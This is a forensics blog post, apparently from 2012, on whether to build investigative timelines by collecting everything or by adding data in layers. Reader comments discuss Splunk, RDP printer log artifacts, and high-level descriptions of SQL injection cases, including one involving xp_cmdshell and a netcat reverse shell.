Friday, January 13, 2012

Timeline Analysis

The DoD Cybercrime Conference is approaching, and I've been doing some thinking about my topic, Timeline Analysis.  I'll be presenting on Wed morning, starting at 8:30am...I remember Cory Altheide saying at one point that all tech conferences should start no sooner than 1pm and run no later than 3:30pm, or something like that.  Cool idea.

So, anyway...I've been thinking about some of the things that I put into pretty much all of my timeline analysis presentations.  When it comes to creating timelines, IMHO there are essentially two "camps", or approaches.  One is what I call the "kitchen sink" approach, which is basically, "Give me everything and let me do the analysis."  The other is what I call the "layered" or "overlay" approach, in which the analyst is familiar with the system being analyzed and adds successive "layers" to the timeline.  When I had a chance to chat with Chad Tilbury at PFIC 2011, he recommended a hybrid of the two approaches...get everything, and then view the data a layer at a time, using something he referred to as a "zoom" capability.  This is something I think is completely within reach...but I digress.

One of the things I've heard folks say about using the "everything" or "kitchen sink" approach is that they'd rather have everything so that they can look at it all when they're conducting analysis, because that's how we find new things.  I completely agree with that (the "finding new things" part), and I think it's a great idea.  After all, one of the core, foundational ideas behind creating timelines is that they can provide a great deal of context to the events we're seeing, and generally speaking, the more data we have, the more context there is likely to be available.  After all, a file modification can be pretty meaningless, in and of itself...but if you are able to see other events going on "nearby", you'll begin to see what events led up to and occurred immediately following the file modification.  For example, you may see that the user launched IE, began browsing the web, requested a specific page, Java was launched, a file was created, and the file in question was modified...all of which provides a great deal of context.

That leads me to this question...if you're running a tool that someone else designed and put together, and you're just pushing a button or launching a command, how do you know that the tool got everything?  How do you know that what you're looking at in the output of the tool is, in fact, everything?

The reason I prefer the layered approach is that it's predicated on (a) fully understanding the goals of your examination, and (b) understanding the system that you're analyzing.  Because you understand your goals, you know what it is you're trying to achieve.  And because you understand that system you're analyzing...Windows XP, Windows 7, also understand how various aspects of the operating system interact and are interconnected.  As such, you're able to identify where there may be additional data, and either request or create your own tools for extracting the data that you need.  Yes, this approach is more manually-intensive than a more automated approach, but it does have it's positive points.  For one, you'll know exactly what should be in the timeline, because you added it.

Alternatively, most often when talking to analysts about collecting data, the sense I get is that the general feeling is to "GET ALL THE THINGS!!" and then begin digging through the volumes of data to perform "analysis".  I had a case a while back that involved SQL injection, and I created a timeline using only the file system metadata and the SQL injection statements from the web server logs; adding everything else available (including user profile data) would have simply made the timeline too cumbersome and too confusing to effectively analyze.  I understood the goals of my exam (i.e., determine what the bad guy did and/or was able to access), and I understood the system (in this case, how SQL injection works, particularly when the database and web server are on the same system).

Now, some folks are going to say, "hey, but what if you missed something?"  To that I say...well, how would you know?  Or, what if you had the data available because you grabbed everything, and because you had no real knowledge of how the system acted, you had no idea that the event(s) you were looking at were important?

Something else to consider is this...what does it tell us when artifacts that we expect to see are not present?  Or...

The absence of an artifact where you would expect to find one is itself an artifact.

Sound familiar?  An example of this would be creating a timeline from an image acquired from a Windows system, and not seeing any indication of Prefetch file metadata in the timeline.  A closer look might reveal that there are no files ending in .pf in the timeline.  So...what does that tell you?  I'll leave that one to the reader...

My point is that while there are (as I see it) two approaches to creating timelines, I'm not saying that one is better than the other...I'm not advocating one approach over another.  I know from experience that there a lot of analysts who are not comfortable operating in the command line (the "dark place"), and as such, might not create a timeline to begin with, and in particular not one that is pretty command-line-intensive.  I also know that there are a good number of folks who use log2timeline pretty regularly, but don't necessarily understand the complete set of data that it collects, or how it goes about doing so.

What I am saying is that, from my perspective, each has it's own strengths and weaknesses, and it's up to the analyst how they want to approach creating timelines.  You may not want to use a manually-intensive approach (which you can easily automate using batch files, a la Corey Harrell's approach), but if you end up using a substantive framework, how do you know you're getting everything?


davnads said...

Harlan, great post. I expanded on some of your thoughts and shared my experience as it relates to the approaches you discussed in a blog response posted here:

I welcome your thoughts. At the end of the day I see a need for a neutral review tool for timeline data to fill these gap.

H. Carvey said...

I don't follow...a "neutral review tool"?

Nick Klein said...

Thanks Harlan, it's always insightful to hear how skilled analysts tackle their work.

I wonder if your approach would differ if your tools were more powerful? For example, if you could very quickly add or remove layers, would you perform your analysis differently?

I mention this because we've been using Splunk for timeline analysis over the last year or so and find it quite powerful. I should add that I have nothing to do with the company or their product, I'm just a user. But I do find it very effective to start with the kitchen sink, then peel away layers to focus on the primary artefacts.

We once had a case where we examined unauthorised remote access and found some log entries showing errors on printer connection that at first appeared irrelevant. Then we realised that the remote computer was configured to connect local printers remotely when making RDP connections, so these entries actually provided a way of fingerprinting the remote computer. A good example of how apparently irrelevant timeline entries can turn out to be gold.

I was keen to share the Splunk technique in case others found it useful. If you're interested there's a link on our blog:

Anonymous said...

My decision on which timeline analysis method (kitchen sink vs layered) to employ is dependent on the situation and my understanding of the methods employed by the attacker(s). Your SQL injection attack reference is a great example to build off in order to help me explain my logic.

Before choosing my timeline analysis method, I would begin analysis with a thorough review of web logs to determine the method of attack. Once I determine that a SQL injection attack was utilized, I group the attack into one of two buckets to help me determine how I want to approach my timeline analysis.

The first bucket is for the standard SQL injection attacks in which data is simply extracted from the database. From my experience, I know these attacks usually begin with the enumeration of table names and move on to the extraction of records from the database. The primary end goal of these attacks is extraction of records from the database - not the execution of shell commands and subsequent system ownership. From my experience, artifacts are therefore typically limited to a handful of sources from the system, such as the web and database logs. In these cases, I take a layered approach and only add those sources that are relevant.

The second bucket are for the more advanced SQL injection attacks in which the attack results in the execution of additional shell commands and/or interaction with the operating system. For instance, the xp_cmdshell stored procedure is exploited via SQL injection to execute code - resulting in the download of a netcat listener. The netcat listener is then used to obtain a reverse shell to the system. The end goal in these instances can vary (foothold into the network, web code alteration, etc) substantially, but in all cases we have the potential for subsequent interaction directly with the operating system. Given this scenario, the potential artifacts left by the attacker are not as limited because they possess OS-level access. Therefore in SQL injection cases involving potential OS-level access, I take the kitchen sink approach.

Your statement, "...and I understood the system (in this case, how SQL injection works, particularly when the database and web server are on the same system).", is important to note. The approach I ultimately choose is case-dependent and based on how well I understand the methods utilized by the attacker(s).

H. Carvey said...


Thanks for the comment. SQL injection cases involving potential OS-level access, I take the kitchen sink approach.

In the example I used, the attack was similar to OS-level access you mentioned. Even so, there's relatively little value in dumping Registry data from all user accounts, because the attacker didn't log in as a user. In my case, everything that was done was done through the use of commands sent to the system via SQL injection; that, and the goals of my examination dictated the use of a limited, layered approach.

The approach I ultimately choose is case-dependent and based on how well I understand the methods utilized by the attacker(s).

My own personal opinion is to not hang my hat on understanding the attacker's method or trying to understand their goals. Instead, I try to "build a story" using my understanding of how the compromised system works and how the various components of that system interact. Even on a subverted system, this is a much more finite data set, and also allows an analyst to recognize when an artifact that should be there is absent.

Again, thanks for your great comment!